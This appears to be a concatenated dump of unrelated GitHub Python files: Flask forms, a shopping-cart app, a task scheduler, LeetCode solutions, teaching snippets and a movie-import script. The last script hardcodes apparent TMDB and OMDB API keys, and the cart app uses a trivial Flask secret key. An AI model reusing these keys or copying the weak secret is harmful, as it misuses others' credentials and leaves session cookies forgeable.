widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n companies_list = QuerySelectMultipleField(\n 'Associated Companies', \n query_factory=lambda: Companies.query.order_by(Companies.id).all(),\n get_label='company_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n sw_categories = QuerySelectMultipleField(\n 'Categories', \n query_factory=lambda: SWCategories.query.order_by(SWCategories.id).all(),\n get_label='sw_categories_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n\n # recaptcha = RecaptchaField()\n submit = SubmitField('Submit')\n\n\n\nclass CropForm(FlaskForm):\n\n \"\"\"crops form entry\"\"\"\n crop_name = StringField(\n 'Crop Name',\n [DataRequired()]\n )\n genus_species = StringField(\n 'Genus species',\n [DataRequired()]\n )\n crop_intellectual_property = StringField(\n 'Intellectual property data',\n [DataRequired()]\n )\n crop_chemicals_used = StringField(\n 'Chemicals used',\n [DataRequired()]\n )\n # sw_id = QuerySelectField(\n # 'Software used', \n # query_factory=lambda: SWProducts.query.all(),\n # get_label='sw_company_product',\n # allow_blank=True\n # )\n sw_id = QuerySelectMultipleField(\n 'Related Software', \n query_factory=lambda: SWProducts.query.order_by(SWProducts.id).all(),\n get_label='sw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n hw_id = QuerySelectMultipleField(\n 'Related Hardware', \n query_factory=lambda: HWProducts.query.order_by(HWProducts.id).all(),\n get_label='hw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n companies_list = QuerySelectMultipleField(\n 'Associated 
Companies', \n query_factory=lambda: Companies.query.order_by(Companies.id).all(),\n get_label='company_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n crop_genetic_information = TextAreaField(\n 'Genetic Information',\n [DataRequired()]\n )\n crop_companions = StringField(\n 'Companions',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n crop_description = StringField(\n 'Description',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n crop_img = FileField(\n 'Crop image',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n crop_references = StringField(\n 'References (links - please separate by comma)',\n [DataRequired()]\n )\n crop_locations = CountrySelectField(\n 'Locations grown',\n )\n\n # recaptcha = RecaptchaField()\n submit = SubmitField('Submit')\n\n\nclass CompanyForm(FlaskForm):\n\n \"\"\"company form entry\"\"\"\n company_name = StringField(\n 'Company Name',\n [DataRequired()]\n )\n company_keywords = StringField(\n 'Keywords',\n )\n company_board_members = StringField(\n 'Board members',\n [DataRequired()]\n )\n company_description = TextAreaField(\n 'Company description',\n [DataRequired()]\n )\n company_img = FileField(\n 'Company image',\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n sw_id = QuerySelectMultipleField(\n 'Related Software', \n query_factory=lambda: SWProducts.query.order_by(SWProducts.id).all(),\n get_label='sw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n hw_id = QuerySelectMultipleField(\n 'Related Hardware', \n query_factory=lambda: HWProducts.query.order_by(HWProducts.id).all(),\n get_label='hw_company_product',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n crops_id = QuerySelectMultipleField(\n 'Related Crops', \n query_factory=lambda: Crops.query.order_by(Crops.id).all(),\n get_label='crop_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n\n related_companies = StringField(\n 'Related Companies',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n company_profits = StringField(\n 'Company Profits',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n\n # recaptcha = RecaptchaField()\n submit = SubmitField('Submit')\n\n\nclass MagickalInterventionForm(FlaskForm):\n string_of_files = [\n 'hex', 'curse', 'spell', 'ritual', 'brew', 'seed', 'invocation', 'incantation', 'necromancy', 'ancestor work', 'other'\n ]\n files = [(x, x) for x in string_of_files]\n \"\"\"crops form entry\"\"\"\n hw_id = QuerySelectField(\n 'Related Hardware', \n query_factory=lambda: HWProducts.query.all(),\n get_label='hw_company_product',\n allow_blank=True\n )\n sw_id = QuerySelectField(\n 'Related Software', \n query_factory=lambda: SWProducts.query.all(),\n get_label='sw_company_product',\n allow_blank=True\n )\n crops_id = QuerySelectField(\n 'Related Crops', \n query_factory=lambda: Crops.query.all(),\n get_label='crop_name',\n allow_blank=True\n )\n company_id = QuerySelectField(\n 'Related Company', \n query_factory=lambda: Companies.query.all(),\n get_label='company_name',\n allow_blank=True\n )\n spell_name = StringField(\n 'Name 
of Magickal Intervention',\n [DataRequired()]\n )\n spell_type = MultiCheckboxField(\n 'Type of magickal intervention',\n choices=files\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n spell_description = TextAreaField(\n 'Spell description',\n [DataRequired()]\n )\n spell_code = TextAreaField(\n 'Spell code',\n [DataRequired()]\n )\n spell_img = FileField(\n 'Company image',\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n spell_locations = CountrySelectField(\n 'Locations for Magickal Intervention',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n spell_networks = StringField(\n 'Covens and other connections',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n\n # recaptcha = RecaptchaField()\n submit = SubmitField('Submit')\n\nclass LocationForm(FlaskForm):\n location_name = StringField(\n 'Name of Location',\n [DataRequired()]\n )\n history_list = QuerySelectField(\n 'history',\n query_factory=lambda: History.query.all(),\n get_label='history_name',\n allow_blank=True\n )\n \n submit = SubmitField('Submit')\n\nclass HistoryForm(FlaskForm):\n history_name = StringField(\n 'Name of History',\n [DataRequired()]\n )\n locations_list = QuerySelectField(\n 'locations',\n query_factory=lambda: Locations.query.all(),\n get_label='location_name',\n allow_blank=True\n )\n \n submit = SubmitField('Submit')\n\nclass SWCategoryForm(FlaskForm):\n sw_categories_name = StringField(\n 'Name of Software Category',\n [DataRequired()]\n )\n submit = SubmitField('Submit')\n\nclass HWCategoryForm(FlaskForm):\n hw_categories_name = StringField(\n 'Name of Hardware Category',\n [DataRequired()]\n )\n submit = SubmitField('Submit')\n\nclass RegistrationForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n email = StringField('Email', validators=[DataRequired(), Email()])\n password = PasswordField('Password', validators=[DataRequired()])\n password2 = PasswordField(\n 'Repeat Password', validators=[DataRequired(), EqualTo('password')])\n submit = SubmitField('Register')\n\n def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user is not None:\n raise ValidationError('Please use a different username.')\n\n def validate_email(self, email):\n user = User.query.filter_by(email=email.data).first()\n if user is not None:\n raise ValidationError('Please use a different email address.')\n\nclass LoginForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n password = PasswordField('Password', validators=[DataRequired()])\n remember_me = BooleanField('Remember Me')\n submit = SubmitField('Sign In')\n\nclass EditProfileForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n submit = SubmitField('Submit')\n\n def __init__(self, original_username, *args, **kwargs):\n super(EditProfileForm, self).__init__(*args, **kwargs)\n self.original_username = original_username\n\n def validate_username(self, username):\n if username.data != self.original_username:\n user = User.query.filter_by(username=self.username.data).first()\n if user is not None:\n raise ValidationError('Please use a different 
username.')","repo_name":"Coven-Intelligence/Insurgent-Ecologies","sub_path":"insurgentecologies/addagtech/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":17677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3595942891","text":"from flask import Flask, render_template, redirect, session\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nimport os\nimport random\n#############################\n# APP FLASK CONFIGURATION\napp = Flask(__name__)\napp.secret_key = \"..\"\n# DATABASE CONFIGURATION\nuri = os.environ.get('MONGO_DB_URI', \"mongodb://127.0.0.1\")\nclient = MongoClient(uri)\ndb = client.meli\n#############################\n\n\n@app.route(\"/\")\ndef meli_view():\n    productos = list(db.productos.find())\n    servicios = list(db.servicios.find())\n    beneficios = list(db.beneficios.find())\n    tiendas = list(db.tiendas.find())\n    extras = list(db.extras.find())\n    supermercado = list(db.supermercado.find())\n    categorias = list(db.categorias.find())\n    avisoPrincipal = db.avisoPrincipal.find()\n    productos = db.productoNuevo.find()\n\n    if not session.get('id'):\n        session['id'] = random.randint(12345, 99999)\n    return render_template(\"meli.html\",\n                           titulo=\"Mercado Libre 2.0 | by: Sr.Cthulhu ©\",\n                           productos=productos,\n                           servicios=servicios,\n                           beneficios=beneficios,\n                           tiendas=tiendas,\n                           extras=extras,\n                           supermercado=supermercado,\n                           categorias=categorias,\n                           avisoPrincipal=avisoPrincipal,\n                           id=session.get('id')\n                           )\n\n\n@app.route(\"/meli/aviso/<id>\")\ndef meli_aviso_view(id):\n    aviso = db.avisoPrincipal.find_one({'_id': ObjectId(id)})\n    return render_template(\"meli_detalle.html\", aviso=aviso)\n\n\n@app.route(\"/meli/linkdecompra/<id>\")\ndef meli_linkdecompra_view(id):\n\n    linkdecompra = db.productoNuevo.find_one({'_id': ObjectId(id)})\n    return render_template(\"meli_detalle.html\", linkdecompra=linkdecompra)\n\n\n@app.route(\"/add/<id>\")\ndef add_product_to_cart(id):\n\n    product = db.productoNuevo.find_one({'_id': ObjectId(id)})\n\n    if not session.get('id'):\n        return redirect('/')\n\n    user = session.get('id')\n\n    nuevo = {}\n    nuevo['title'] = product['title']\n    nuevo['cover'] = product['cover']\n    nuevo['price'] = product['price']\n\n    nuevo['user_id'] = user\n\n    db.cart.insert_one(nuevo)\n\n    return redirect('/cart')\n\n\n@app.route(\"/cart\")\ndef cart_view():\n    if not session.get('id'):\n        return redirect('/')\n    user = session.get('id')\n\n    productoagregado = list(db.cart.find({'user_id': user}))\n    return render_template(\n        \"cart.html\", productoagregado=productoagregado)\n\n\n@app.route(\"/checkout/<id>\")\ndef check_view(id):\n    user = session.get('id')\n\n    compra = list(db.cart.find({'user_id': user}))\n    # Render in the template what was added to the cart in the database.\n    return render_template(\"checkout.html\", compra=compra)\n","repo_name":"SrCthulhu/meli","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22923662644","text":"from __future__ import print_function\n\nimport random\nimport socket\nfrom Worker import Worker\nimport Pyro4\ntry:\n    import queue  # py3\nexcept ImportError:\n    import Queue as queue  # py2\n\nfrom Pyro4.util import SerializerBase\nfrom Job import Job\nSerializerBase.register_dict_to_class(\"Job.Job\", Job.from_dict)\n\n\nclass Scheduler(object):\n    METHOD_RAND = \"RANDOM\"\n    METHOD_TWO = \"CHOOSE_TWO\"\n    METHOD_BATCH = \"BATCH\"\n    METHOD_LATE 
= \"BATCH+LATE_BINDING\"\n\n def __init__(self, scheduling_method=METHOD_RAND, nameserver_hostname=\"newyork\", scheduler_number=1):\n self.no_of_workers_per_scheduler = 10\n self.scheduling_method = scheduling_method\n print(\"Scheduling method: \", self.scheduling_method)\n\n # Number of the scheduler\n self.scheduler_number = scheduler_number\n\n # List of jobs that have been scheduled/reserved\n self.in_progress_jobs = {}\n self.workers = []\n self.assigned_tasks = []\n self.name_server = Pyro4.locateNS(nameserver_hostname)\n\n def set_method(self, method):\n self.scheduling_method = method\n\n if method == Scheduler.METHOD_LATE:\n for worker in self.workers:\n worker.set_late_binding(True)\n else:\n for worker in self.workers:\n worker.set_late_binding(False)\n\n def update_workers(self):\n # List all sparrow workers (i.e. sparrow.worker.arizona)\n worker_dict = self.name_server.list('sparrow.worker')\n\n new_workers = []\n # Add new workers\n for key in worker_dict:\n worker = Pyro4.Proxy(worker_dict[key])\n new_workers.append(worker)\n if worker not in self.workers:\n self.workers.append(worker)\n\n # Clean nameserver\n missing_nodes = list(set(self.workers) - set(new_workers))\n for missing_node in missing_nodes:\n print(\"Trimming %s from nameserver.\" % (missing_node.name))\n self.name_server.remove(name=missing_node.name)\n # Remove local\n self.workers.remove(missing_node)\n\n # print(self.workers)\n\n def schedule(self, job):\n \"\"\"\n Schedules a job, which has been broken down into tasks\n :param job: A Job object\n \"\"\"\n # print(\"Scheduling job\")\n self.update_workers()\n self.no_of_workers_per_scheduler = len(self.workers)\n self.in_progress_jobs[job.id] = job\n\n self.method_chosen(job)\n\n # For late binding, worker asks for permission to start task\n def request_task(self, job_id, task_id):\n task_requested = [job_id, task_id]\n if task_requested in self.assigned_tasks:\n self.assigned_tasks.remove(task_requested)\n return True\n else:\n return False\n\n def task_completed(self, job_id, task_id):\n if job_id not in self.in_progress_jobs:\n print(\"Job not found\", job_id)\n return\n if task_id not in self.in_progress_jobs[job_id].tasks:\n print(\"Task not found in \", self.in_progress_jobs[job_id])\n return\n\n print(\"Worker completed (job,task) \", job_id, task_id)\n self.in_progress_jobs[job_id].tasks.pop(task_id)\n\n if len(self.in_progress_jobs[job_id].tasks) == 0:\n print(\"Job %d completed\" % (self.in_progress_jobs[job_id].id))\n self.in_progress_jobs.pop(job_id)\n\n # This method defines which method is being used to assign jobs\n def method_chosen(self, job):\n if self.scheduling_method == Scheduler.METHOD_RAND:\n self.set_method(Scheduler.METHOD_RAND)\n self.rand(job)\n elif self.scheduling_method == Scheduler.METHOD_TWO:\n self.set_method(Scheduler.METHOD_TWO)\n self.choose_two(job)\n elif self.scheduling_method == Scheduler.METHOD_BATCH:\n self.set_method(Scheduler.METHOD_BATCH)\n self.batch(job, False)\n elif self.scheduling_method == Scheduler.METHOD_LATE:\n self.set_method(Scheduler.METHOD_LATE)\n self.batch(job, True)\n\n # Implements random choosing of workers for tasks\n def rand(self, job):\n print(\"Random method\")\n\n for task_id in job.tasks:\n sent = False\n while not sent:\n random_worker = random.randint(((self.scheduler_number -1)*self.no_of_workers_per_scheduler),\n ((self.scheduler_number*self.no_of_workers_per_scheduler) -1))\n try:\n self.workers[random_worker].add_task(job.id, task_id, job.tasks[task_id])\n sent = True\n except 
Exception as e:\n                    pass\n\n    # Implements choose two method of assigning tasks to workers\n    def choose_two(self, job):\n        print(\"Choose Two method\")\n        for task_id in job.tasks:\n            rand_work1 = random.randint(((self.scheduler_number -1)*self.no_of_workers_per_scheduler),\n                                        ((self.scheduler_number*self.no_of_workers_per_scheduler) -1))\n            done = False\n            while not done:\n                rand_work2 = random.randint(((self.scheduler_number -1)*self.no_of_workers_per_scheduler),\n                                            ((self.scheduler_number*self.no_of_workers_per_scheduler) -1))\n                if rand_work1 != rand_work2:\n                    done = True\n            work1_load = self.workers[rand_work1].find_load()\n            work2_load = self.workers[rand_work2].find_load()\n            if int(work1_load) < int(work2_load):\n                self.workers[rand_work1].add_task(job.id, task_id, job.tasks[task_id])\n            else:\n                self.workers[rand_work2].add_task(job.id, task_id, job.tasks[task_id])\n\n    # Implements batch processing method of assigning tasks to workers\n    # as well as batch processing plus late binding\n    def batch(self, job, late_binding):\n        if late_binding:\n            print(\"Batch processing with late binding\")\n        else:\n            print(\"Batch processing\")\n\n        choose = 2\n\n        if len(self.workers) >= (choose * len(job.tasks)):\n            print(\"Number of workers is adequate\")\n            random_workers = self.pick_random_workers(choose * len(job.tasks))\n\n            if late_binding:\n                for task_id in job.tasks:\n                    if [job.id, task_id] not in self.assigned_tasks:\n                        self.assigned_tasks.append([job.id, task_id])\n                    for each_worker in random_workers:\n                        self.workers[each_worker].add_task(job.id, task_id, job.tasks[task_id])\n            else:\n                worker_load = []\n                for each in random_workers:\n                    worker_load.append([self.workers[each].find_load(), each])\n                worker_load.sort()\n                for task_id in job.tasks:\n                    worker_id = worker_load[task_id]\n                    self.workers[worker_id[1]].add_task(job.id, task_id, job.tasks[task_id])\n\n        else:\n            print(\"Number of workers not adequate\")\n            task_idx = 0\n            while task_idx < len(job.tasks):\n                num_workers = min(((len(job.tasks)-task_idx) * choose), len(self.workers))\n                random_worker_indices = self.pick_random_workers(num_workers)\n\n                if late_binding:\n                    # integer division keeps range() valid on both py2 and py3\n                    for task_id in range(len(random_worker_indices) // choose):\n                        if [job.id, task_idx] not in self.assigned_tasks:\n                            self.assigned_tasks.append([job.id, task_idx])\n                        for each_worker_index in random_worker_indices:\n                            self.workers[each_worker_index].add_task(job.id, task_idx, job.tasks[task_idx])\n                        task_idx += 1\n                else:\n                    worker_load = []\n                    for random_work_idx in random_worker_indices:\n                        worker_load.append([self.workers[random_work_idx].find_load(), random_work_idx])\n                    worker_load.sort()\n                    for task_id in range(len(random_worker_indices) // choose):\n                        worker_id = worker_load[task_id]\n                        self.workers[worker_id[1]].add_task(job.id, task_idx, job.tasks[task_idx])\n                        task_idx += 1\n\n    # Picks random servers to probe\n    def pick_random_workers(self, no_of_workers_to_probe):\n\n        random_servers = []\n        while no_of_workers_to_probe > 0:\n            rand_work1 = random.randint(0, len(self.workers)-1)\n            if rand_work1 not in random_servers:\n                random_servers.append(rand_work1)\n                no_of_workers_to_probe -= 1\n        # print(str(random_servers))\n        return random_servers\n\n\nif __name__ == \"__main__\":\n    scheduler_number = 1\n    hostname = socket.gethostname()\n    name_in_nameserver = \"sparrow.scheduler.\" + str(int(scheduler_number))\n    Pyro4.config.SERVERTYPE = \"multiplex\"\n    Pyro4.Daemon.serveSimple(\n        {\n            Scheduler(Scheduler.METHOD_RAND): name_in_nameserver\n        },\n        host=hostname\n        
)\n","repo_name":"ahollenbach/sparrow","sub_path":"src/Scheduler.py","file_name":"Scheduler.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18013689220","text":"# https://leetcode.com/explore/interview/card/bloomberg/68/array-and-strings/373/\n\nimport collections\nimport string\n\n\nclass Solution:\n    def firstUniqChar(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        charCount = collections.defaultdict(int)\n        for i in s:\n            charCount[i] += 1\n        for j, v in enumerate(s):\n            if charCount[v] == 1:\n                return j\n        return -1\n        # Two passes through the string, counting occurrences. Faster than ~81% of submissions\n\n    def firstUniqCharOneLine(self, s):\n        return min([s.find(c) for c in string.ascii_lowercase if s.count(c) == 1] or [-1])\n        # For each letter of the alphabet whose count in the string is exactly 1, take its first index; the minimum is the answer\n    ","repo_name":"vincentt117/coding_challenge","sub_path":"lc_first_unqiue_character_in_a_string.py","file_name":"lc_first_unqiue_character_in_a_string.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2154864160","text":"import json\nimport os\nimport platform\n\nDEVELOPMENT = platform.system() == \"Windows\"\nROOT_DIRPATH = os.path.dirname(__file__)\nLOG_DIRPATH = os.path.join(ROOT_DIRPATH, \"log\")\n\nKEYS_PATH = os.path.join(ROOT_DIRPATH, \"keys.json\")\nLOG_FORMAT = \"%(asctime)s - %(levelname)s :: 
%(threadName)s :: %(name)s %(lineno)d :: %(message)s\"\nDATETIME_STANDARD_FORMAT = \"%Y-%m-%dT%H:%M:%S.%fZ\"\nDATETIME_STANDARD_FORMAT2 = \"%Y-%m-%dT%H:%M:%SZ\"\nDATETIME_STANDARD_SHOW_FORMAT = \"%d/%m/%Y %H:%M:%S\"\n\nTEMPLATES_FOLDER_PATH = os.path.join(ROOT_DIRPATH, \"templates\")\nSTATIC_FOLDER_PATH = os.path.join(ROOT_DIRPATH, \"static\")\n\nSPOTIFY_AUTH_TIMESPAN = 600\n\nCONFIGS_PATH = os.path.join(ROOT_DIRPATH, \"keys.json\")\nSPOTIFY_PATH = os.path.join(ROOT_DIRPATH, \"spotify.json\")\n\nos.makedirs(LOG_DIRPATH, exist_ok=True)\nLOG_OUTPUT_TO_CONSOLE = DEVELOPMENT\n\nwith open(CONFIGS_PATH, 'r') as f:\n CONFIGS = json.load(f)\n\nwith open(SPOTIFY_PATH, 'r') as f:\n SPOTIFY_DEFINITIONS = json.load(f)\n","repo_name":"alexregazzo/MusicManager","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15151585529","text":"N = int(input())\r\ninputs = [input() for _ in range(N)]\r\n\r\nused = [inputs[0]]\r\nfor i in range(1, N):\r\n if inputs[i-1][-1] != inputs[i][0] or inputs[i] in used:\r\n print('LOSE' if i % 2 == 0 else 'WIN')\r\n break\r\n else:\r\n used.append(inputs[i])\r\nelse:\r\n print('DRAW')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc014/B/4010544.py","file_name":"4010544.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"23905856964","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Post, Rating, Comment\nfrom .forms import PostForm, CommentForm, RatingForm\nfrom django.db.models import Avg\nfrom django.views.generic import ListView\n\n\n@login_required\ndef post_list(request):\n posts = Post.objects.all()\n post_rating = Rating.objects.values_list('post_id').annotate(avg_rating=Avg('rating'))\n context = {\n 'posts': posts,\n 'post_rating': post_rating\n }\n return render(request, 'post_list.html', context)\n\n\n\n\n@login_required\ndef post_create(request):\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.save()\n return redirect('posts:post_list')\n else:\n form = PostForm()\n return render(request, 'post_form.html', {'form': form})\n\n\n@login_required\ndef post_edit(request, pk):\n post = Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.save()\n return redirect('posts:post_list')\n else:\n form = PostForm(instance=post)\n return render(request, 'post_form.html', {'form': form})\n\n@login_required\ndef post_delete(request, pk):\n post = Post.objects.get(pk=pk)\n post.delete()\n return redirect('posts:post_list')\n\n@login_required\ndef add_comment_to_post(request, pk):\n post = Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.author = request.user\n comment.save()\n return redirect('posts:add_rating_to_post', pk=post.pk)\n else:\n return redirect('posts:post_list')\n else:\n form = CommentForm()\n return render(request, 'add_comment_to_post.html', {'form': form})\n\n@login_required\ndef post_detail(request, pk):\n post = 
Post.objects.get(pk=pk)\n    comments = post.comments.all()\n    comment = Comment.objects.filter(post=post)\n    ratings = Rating.objects.filter(post=post).all()\n    rating = ratings.values_list('rating')\n    average_rating = ratings.aggregate(Avg('rating'))['rating__avg']\n    if request.method == 'POST':\n        form = CommentForm(request.POST)\n        if form.is_valid():\n            comment = form.save(commit=False)\n            comment.post = post\n            comment.author = request.user\n            comment.save()\n            return redirect('posts:post_detail', pk=post.pk)\n    else:\n        form = CommentForm()\n    return render(request, 'post_detail.html', {'post': post, 'comments': comments, 'form': form, 'ratings': ratings, 'average_rating': average_rating, 'rating': rating})\n\n\n@login_required\ndef add_rating_to_post(request, pk, *args, **kwargs):\n    post = Post.objects.get(pk=pk)\n    comment = Comment.objects.filter(post=post)\n    if request.method == 'POST':\n        form = RatingForm(request.POST)\n        if form.is_valid():\n            rating = form.save(commit=False)\n            rating.post = post\n            rating.user = request.user\n            rating.comments_id = comment.values_list('id').last()[0]\n            rating.save()\n            return redirect('posts:post_detail', pk=post.pk)\n        else:\n            return redirect('posts:post_list')\n    else:\n        form = RatingForm()\n    return render(request, 'add_rating_to_post.html', {'form': form})\n\n\nclass SearchResultsView(ListView):\n    model = Post\n    template_name = 'search_results.html'\n    def get_queryset(self):  # new\n        query = self.request.GET.get('q')\n        object_list = Post.objects.filter(school_name__icontains=query)\n        return object_list\n","repo_name":"filipov0991/Django-Rating-school","sub_path":"service/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"70800485034","text":"# Tail recursion is a type of recursion in which the parent call has nothing\n# left to do once the child call finishes.\n# Tail-recursive calls run fast when the input size is large, mainly because\n# the caller does not need to save its state before making the recursive call.\n# Tail recursion is one of the reasons that quick sort is faster than merge sort.\n# For example, computing a factorial using a tail-recursive method:\n
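# For contrast (added note, illustrative only), a NON-tail-recursive factorial\n# does its multiplication AFTER the recursive call returns, so every stack\n# frame must be kept alive until the recursion bottoms out:\n#\n#     def fact_plain(n):\n#         if n <= 1:\n#             return 1\n#         return n * fact_plain(n - 1)\n#\n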
def fact(n, k):\n    if n == 0 or n == 1:\n        print(k)\n    else:\n        fact(n-1, n*k)\nn = int(input(\"enter your number for tail recursion\"))\nfact(n, 1)\n\n","repo_name":"gokuljs/python-rev","sub_path":"geeks_for_geeks/recursion/tail_recursion.py","file_name":"tail_recursion.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"21911625558","text":"# Try-Except Block:\ntry:\n    # Code that may raise an exception\n    result = 10 / 0\nexcept ZeroDivisionError:\n    # Code to handle the ZeroDivisionError exception\n    print(\"Division by zero is not allowed.\")\n\n\n# Handling Multiple Exceptions:\ntry:\n    x = int(input(\"Enter a number: \"))\n    result = 10 / x\nexcept ValueError:\n    print(\"Invalid input. Please enter a number.\")\nexcept ZeroDivisionError:\n    print(\"Division by zero is not allowed.\")\n\n\n# Handling All Exceptions:\n'''\ntry:\n    # Code that may raise an exception\nexcept Exception as e:\n    # Code to handle any exception\n    print(\"An error occurred:\", e)\n\n'''\n\n\n# Finally Block:\n'''\ntry:\n    # Code that may raise an exception\nexcept Exception as e:\n    # Code to handle the exception\nfinally:\n    # Code that will always execute\n\n'''\n","repo_name":"youseftareq33/Python_language","sub_path":"Python_Basic/12handelExption.py","file_name":"12handelExption.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"40438099499","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-09-24 16:53:47\n# @Last Modified time: 2016-09-24 16:56:14\n# @FileName: 122.py\n\n\nclass Solution(object):\n    def maxProfit(self, prices):\n        \"\"\"\n        :type prices: List[int]\n        :rtype: int\n        \"\"\"\n        ans = 0\n        for i in range(1, len(prices)):\n            if prices[i - 1] < prices[i]:\n                ans += prices[i] - prices[i - 1]\n        return ans","repo_name":"LichAmnesia/LeetCode","sub_path":"python/122.py","file_name":"122.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"33627517054","text":"# coding:utf-8\n\n# random.random returns a random float between 0 and 1\n# random.uniform returns a random float in the interval [a, b]\n# random.randint returns a random integer in the interval [a, b]\n# random.choice returns one random element from a sequence\n# random.sample returns the specified number of random elements from a sequence\n# random.randrange returns a random number from a range; a step can be passed to control the spacing of possible results\n\nimport random\n\ngifts = ['iphone', 'ipad', 'iwatch', 'appletv']\n\n\ndef choice_gifts():\n    data = random.choice(gifts)\n    print(f'You drew a {data}')\n\n\ndef choice_gift_new():\n    count = random.randrange(0, 100, 1)\n    # count = random.choice(range(0, 100, 1)) is equivalent to the line above\n    print(count)\n    if 0 <= count <= 50:\n        print('You won an iphone')\n    elif 50 < count <= 70:\n        print('You won an iwatch')\n    elif 70 < count <= 90:\n        print('You won an appleTv')\n    else:\n        print('You won an appleCar')\n\n\nif __name__ == '__main__':\n    choice_gift_new()","repo_name":"skyetang/py-useful","sub_path":"pack_animal/pack_random.py","file_name":"pack_random.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"72630489834","text":"from app import db\nfrom models import User, Movie, Genre, Actor, Director, Writer\nimport requests\nimport pdb\n\nTMDB_BASE_URL = 'https://api.themoviedb.org/3'\nTMDB_API_KEY = '2c8276507ce2b6c8c6617c916d6fa4a1'\nOMDB_BASE_URL = 'http://www.omdbapi.com'\nOMDB_API_KEY = 'a2f9bc6'\n\n\ndef get_imdb_id(TMDB_id):\n    imdb_id = requests.get(\n        f'{TMDB_BASE_URL}/movie/{TMDB_id}',\n        params={'api_key': TMDB_API_KEY}\n    ).json()['imdb_id']\n\n    return imdb_id\n\ndef get_movie(imdb_id):\n    movie = requests.get(\n        OMDB_BASE_URL,\n        params={'apikey': OMDB_API_KEY, 'i': imdb_id, 'plot': 'full'}\n    ).json()\n\n    return movie\n\ndef add_directors(director_list, movie):\n    for director in director_list:\n        try:\n            new_director = Director(name=director)\n            db.session.add(new_director)\n            db.session.commit()\n\n            movie.directors.append(new_director)\n        except Exception:\n            db.session.rollback()\n            continue\n    return None\n\ndef add_actors(actor_list, movie):\n    for actor in actor_list:\n        try:\n            new_actor = Actor(name=actor)\n            db.session.add(new_actor)\n            db.session.commit()\n\n            movie.actors.append(new_actor)\n        except Exception:\n            
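# added note: after a failed INSERT (e.g. a duplicate name hitting a unique\n            # constraint) the SQLAlchemy session is unusable until it is rolled back\n            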
